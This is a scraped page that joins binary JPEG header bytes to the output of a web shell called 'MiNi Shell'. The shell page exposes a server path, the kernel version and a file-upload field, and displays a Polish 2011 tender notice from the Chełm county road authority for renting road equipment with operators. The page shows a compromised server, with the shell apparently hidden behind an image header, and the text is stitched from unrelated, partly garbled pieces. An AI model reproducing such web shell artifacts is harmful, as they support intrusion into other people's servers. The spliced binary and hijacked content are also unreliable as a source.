JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110517/139993-N-2011.html

<p class="kh_header"><b>Chełm: NAJEM SPRZĘTU DO BIEŻĄCEGO UTRZYMANIA DRÓG POWIATOWYCH NA TERENIE POWIATU CHEŁMSKIEGO W 2011 ROKU</b><br>
<b>Numer ogłoszenia: 139993 - 2011; data zamieszczenia: 17.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Chełmie , pl. Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 082 5627588, faks 082 5627587.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.chelmski.iap.pl/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NAJEM SPRZĘTU DO BIEŻĄCEGO UTRZYMANIA DRÓG POWIATOWYCH NA TERENIE POWIATU CHEŁMSKIEGO W 2011 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest najem sprzętu do bieżącego utrzymania dróg powiatowych na terenie powiatu chełmskiego administrowanych przez Zarząd Dróg Powiatowych  w Chełmie. 
Zamawiający dopuszcza składanie ofert częściowych i w tym celu dokonuje podziału zamówienia na 4 części. 

Część I zadania: najem równiarki drogowej 

Przedmiotem zamówienia CZĘŚCI I zadania jest najem równiarki drogowej wraz z operatorem w ilości do 160,00 h. 
Wymagane parametry  i warunki techniczne:
1.równiarka drogowa samojezdna o mocy minimalnej 100,00 KM,
2.przedni lemiesz  podnoszony i opuszczany,
3.środkowy lemiesz z możliwością przesuwu i obrotu,
4.mocowany z tyłu równiarki zrywak z zębami,
5.równiarka trzy osiowa, w tym z dwiema osiami napędowymi.

Równiarka będzie służyć do rozpychania mieszanki kamiennej frakcji 2,5-80 mm i nadawania właściwego profilu na remontowanych drogach gruntowych.
Wykonawca zobowiązany jest do świadczenia  usługi na każde telefoniczne zamówienie Zamawiającego.  W ciągu 2 godzin od momentu zawiadomienia Wykonawca winien rozpocząć świadczenie usługi w miejscu każdorazowo wskazanym przez Zamawiającego.
Podana ilość godzin świadczenia usługi  jest wartością szacunkową, w przypadku nie zrealizowania przedmiotu zamówienia pod względem ilościowym  w czasie trwania umowy, usługę uważa się za zakończoną z dniem 31 grudnia 2011 roku bez jakichkolwiek roszczeń odszkodowawczych. Minimalna realizacja ilościowa to 70 % przedmiotu zamówienia. 

Część II zadania: najem koparki kołowej 

Przedmiotem zamówienia CZĘŚCI II zadania jest najem koparki kołowej  wraz z operatorem w ilości do 200,00 h. 
Wymagane parametry  i warunki techniczne:
1.napęd 4x4, cztery koła tej samej wielkości,
2.łyżka skarpowa o szerokości min. 1500,00 mm,
3.moc silnika min. 60 KM,
4.wysięg ramienia roboczego min. 6,00 m,

Koparka będzie służyć do prac ziemnych, między innymi wykonywania nowych i pogłębiania istniejących rowów przydrożnych przy drogach powiatowych, a także do zakładania przepustów pod zjazdami z dróg powiatowych.
Wykonawca zobowiązany jest do świadczenia  usługi na każde telefoniczne zamówienie Zamawiającego.  W ciągu 2 godzin od momentu zawiadomienia Wykonawca winien rozpocząć świadczenie usługi w miejscu każdorazowo wskazanym przez Zamawiającego.
Podana ilość godzin świadczenia usługi  jest wartością szacunkową, w przypadku nie zrealizowania przedmiotu zamówienia pod względem ilościowym  w czasie trwania umowy, usługę uważa się za zakończoną z dniem 31 grudnia 2011 roku bez jakichkolwiek roszczeń odszkodowawczych. Minimalna realizacja ilościowa to 70 % przedmiotu zamówienia. 

Część III zadania: najem walca drogowego samojezdnego

Przedmiotem zamówienia CZĘŚCI III zadania jest najem walca drogowego samojezdnego   wraz z operatorem w ilości do 160,00 h. 
Wymagane parametry  i warunki techniczne:
1.waga walca min. 8,00 t,
2.walec wibracyjny stalowo- gumowy,

Walec będzie służyć do  zagęszczania rozłożonej na drogach gruntowych mieszanki kamiennej. 
Wykonawca zobowiązany jest do świadczenia  usługi na każde telefoniczne zamówienie Zamawiającego.  W ciągu 2 godzin od momentu zawiadomienia Wykonawca winien rozpocząć świadczenie usługi w miejscu każdorazowo wskazanym przez Zamawiającego.
Podana ilość godzin świadczenia usługi  jest wartością szacunkową, w przypadku nie zrealizowania przedmiotu zamówienia pod względem ilościowym  w czasie trwania umowy, usługę uważa się za zakończoną z dniem 31 grudnia 2011 roku bez jakichkolwiek roszczeń odszkodowawczych. Minimalna realizacja ilościowa to 70 % przedmiotu zamówienia. 

Część IV zadania: najem samochodu ciężarowego samowyładowczego 

Przedmiotem zamówienia CZĘŚCI IV zadania jest najem samochodu ciężarowego samowyładowczego wraz z kierowcą ilości do 200,00 h. 
Wymagane parametry  i warunki techniczne:
1.samochód ciężarowy samowyładowczy o ładowności od 14,00 t do 20,00 t,
2.pojazd przystosowany do wyładunku tylnego i bocznego (wywrót 3-stronny).

Samochód  będzie służyć do przewozu materiałów budowlanych podczas remontów rowów przydrożnych oraz zakładania przepustów. 
Wykonawca zobowiązany jest do świadczenia  usługi na każde telefoniczne zamówienie Zamawiającego.  W ciągu 2 godzin od momentu zawiadomienia Wykonawca winien rozpocząć świadczenie usługi w miejscu każdorazowo wskazanym przez Zamawiającego.
Podana ilość godzin świadczenia usługi  jest wartością szacunkową, w przypadku nie zrealizowania przedmiotu zamówienia pod względem ilościowym  w czasie trwania umowy, usługę uważa się za zakończoną z dniem 31 grudnia 2011 roku bez jakichkolwiek roszczeń odszkodowawczych. Minimalna realizacja ilościowa to 70 % przedmiotu zamówienia. 

Oferty częściowe mogą obejmować  część I, II, III i IV zadania. Wykonawca może złożyć ofertę na całość zamówienia bądź poszczególne jego części. 

Zamawiający zastrzega sobie prawo dokonania oględzin sprzętu oferowanego przez wszystkich Wykonawców w zakresie jego parametrów technicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający przewiduje udzielenie  w okresie 3 lat od udzielenia zamówienia podstawowego zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.
2.Określenie przedmiotu, wielkości lub zakresu zamówień uzupełniających: Zamawiający przewiduje udzielenie zamówienia uzupełniającego, stanowiącego nie więcej niż 50 % wartości zamówienia podstawowego, tj.: 

Część I zadania: najem równiarki drogowej 
Przedmiotem zamówienia CZĘŚCI I zadania jest najem równiarki drogowej wraz z operatorem w ilości do 80,00 h. 
Wymagane parametry  i warunki techniczne:
1.równiarka drogowa samojezdna o mocy minimalnej 100,00 KM,
2.przedni lemiesz  podnoszony i opuszczany,
3.środkowy lemiesz z możliwością przesuwu i obrotu,
4.mocowany z tyłu równiarki zrywak z zębami,
5.równiarka trzy osiowa, w tym z dwiema osiami napędowymi.

Równiarka będzie służyć do rozpychania mieszanki kamiennej frakcji 2,5-80 mm i nadawania właściwego profilu na remontowanych drogach gruntowych.
Wykonawca zobowiązany jest do świadczenia  usługi na każde telefoniczne zamówienie Zamawiającego.  W ciągu 2 godzin od momentu zawiadomienia Wykonawca winien rozpocząć świadczenie usługi w miejscu każdorazowo wskazanym przez Zamawiającego.
Podana ilość godzin świadczenia usługi  jest wartością szacunkową, w przypadku nie zrealizowania przedmiotu zamówienia pod względem ilościowym  w czasie trwania umowy, usługę uważa się za zakończoną z dniem 31 grudnia 2011 roku bez jakichkolwiek roszczeń odszkodowawczych. Minimalna realizacja ilościowa to 70 % przedmiotu zamówienia. 

Część II zadania: najem koparki kołowej 
Przedmiotem zamówienia CZĘŚCI II zadania jest najem koparki kołowej  wraz z operatorem w ilości do 100,00 h. 
Wymagane parametry  i warunki techniczne:
1.napęd 4x4, cztery koła tej samej wielkości,
2.łyżka skarpowa o szerokości min. 1500,00 mm,
3.moc silnika min. 60 KM,
4.wysięg ramienia roboczego min. 6,00 m,

Koparka będzie służyć do prac ziemnych, między innymi wykonywania nowych i pogłębiania istniejących rowów przydrożnych przy drogach powiatowych, a także do zakładania przepustów pod zjazdami z dróg powiatowych.
Wykonawca zobowiązany jest do świadczenia  usługi na każde telefoniczne zamówienie Zamawiającego.  W ciągu 2 godzin od momentu zawiadomienia Wykonawca winien rozpocząć świadczenie usługi w miejscu każdorazowo wskazanym przez Zamawiającego.
Podana ilość godzin świadczenia usługi  jest wartością szacunkową, w przypadku nie zrealizowania przedmiotu zamówienia pod względem ilościowym  w czasie trwania umowy, usługę uważa się za zakończoną z dniem 31 grudnia 2011 roku bez jakichkolwiek roszczeń odszkodowawczych. Minimalna realizacja ilościowa to 70 % przedmiotu zamówienia. 

Część III zadania: najem walca drogowego samojezdnego
Przedmiotem zamówienia CZĘŚCI III zadania jest najem walca drogowego samojezdnego wraz z operatorem w ilości do 80,00 h. 
Wymagane parametry  i warunki techniczne:
1.waga walca min. 8,00 t,
2.walec wibracyjny stalowo- gumowy,

Walec będzie służyć do  zagęszczania rozłożonej na drogach gruntowych mieszanki kamiennej. 
Wykonawca zobowiązany jest do świadczenia  usługi na każde telefoniczne zamówienie Zamawiającego.  W ciągu 2 godzin od momentu zawiadomienia Wykonawca winien rozpocząć świadczenie usługi w miejscu każdorazowo wskazanym przez Zamawiającego.
Podana ilość godzin świadczenia usługi  jest wartością szacunkową, w przypadku nie zrealizowania przedmiotu zamówienia pod względem ilościowym  w czasie trwania umowy, usługę uważa się za zakończoną z dniem 31 grudnia 2011 roku bez jakichkolwiek roszczeń odszkodowawczych. Minimalna realizacja ilościowa to 70 % przedmiotu zamówienia. 

Część IV zadania: najem samochodu ciężarowego samowyładowczego 
Przedmiotem zamówienia CZĘŚCI IV zadania jest wynajem samochodu ciężarowego samowyładowczego wraz z kierowcą ilości do 100,00 h. 
Wymagane parametry  i warunki techniczne:
1.samochód ciężarowy samowyładowczy o ładowności od 14,00 t do 20,00 t,
2.pojazd przystosowany do wyładunku tylnego i bocznego (wywrót 3-stronny).

Samochód  będzie służyć do przewozu materiałów budowlanych podczas remontów rowów przydrożnych oraz zakładania przepustów. 
Wykonawca zobowiązany jest do świadczenia  usługi na każde telefoniczne zamówienie Zamawiającego.  W ciągu 2 godzin od momentu zawiadomienia Wykonawca winien rozpocząć świadczenie usługi w miejscu każdorazowo wskazanym przez Zamawiającego.
Podana ilość godzin świadczenia usługi  jest wartością szacunkową, w przypadku nie zrealizowania przedmiotu zamówienia pod względem ilościowym  w czasie trwania umowy, usługę uważa się za zakończoną z dniem 31 grudnia 2011 roku bez jakichkolwiek roszczeń odszkodowawczych. Minimalna realizacja ilościowa to 70 % przedmiotu zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.52.00.00-8, 60.18.10.00-0, 45.50.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca winien wykazać dysponowanie zasobami:
CZĘŚĆ I ZADANIA:
1. równiarka drogowa-  równiarka drogowa samojezdna o mocy minimalnej 100,00 KM, przedni lemiesz  podnoszony i opuszczany, środkowy lemiesz z możliwością przesuwu i obrotu, mocowany z tyłu równiarki zrywak z zębami, równiarka trzy osiowa, w tym z dwiema osiami napędowymi- 1 szt. 
CZĘŚĆ II ZADANIA:
1. koparka kołowa- napęd 4x4, cztery koła tej samej wielkości,
łyżka skarpowa o szerokości min. 1500,00 mm, moc silnika min. 60 KM, wysięg ramienia roboczego min. 6,00 m- 1 szt. 

CZĘŚĆ III ZADANIA:
1. walec drogowy samojezdny- waga walca min. 8,00 t, walec wibracyjny stalowo- gumowy- 1 szt. 
CZĘŚĆ IV ZADANIA:
1. samochód ciężarowy samowyładowczy- samochód ciężarowy samowyładowczy o ładowności od 14,00 t do 20,00 t, pojazd przystosowany do wyładunku tylnego i bocznego (wywrót 3-stronny)- 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami  zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobami: 
CZĘŚĆ I ZADANIA:
- 1 osobą do pełnienia funkcji operatora  równiarki  posiadającą uprawnienia do pracy na równiarce.
CZĘŚĆ II ZADANIA:
- 1 osobą do pełnienia funkcji operatora  koparki  posiadającą uprawnienia do pracy na koparce.
CZĘŚĆ III ZADANIA:
- 1 osobą do pełnienia funkcji operatora  walca  posiadającą uprawnienia do pracy na walcu drogowym.
CZĘŚĆ IV ZADANIA:
- 1 osobą do pełnienia funkcji kierowcy  posiadającą prawo jazdy kategorii C.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca polega  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  
Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1  oraz w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy   w sprawie zamówienia publicznego. Dokumenty należy złożyć w formie oryginału lub kopi poświadczonej za zgodność  z oryginałem przez Wykonawcę bądź upoważnionego przedstawiciela Wykonawcy, zgodnie  z treścią dokumentu określającego status Wykonawcy bądź treścią załączonego do oferty pełnomocnictwa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany istotnych postanowień  zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy polegające na:  zmiana osób (kierowcy, operatorów) uczestniczących w wykonaniu zamówienia. Jeżeli Wykonawca zwróci się pisemnie do Zamawiającego z prośbą o zmianę osób uczestniczących w wykonywaniu zamówienia, załącza również wymagane w pkt 6 SIWZ oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu określonych przez Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chelmski.iap.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Chełmie
Plac Niepodległości 1
22-100 Chełm
I piętro, pokój Nr 85.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Chełmie
Plac Niepodległości 1, 22-100 Chełm
I piętro, pokój Nr 87.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com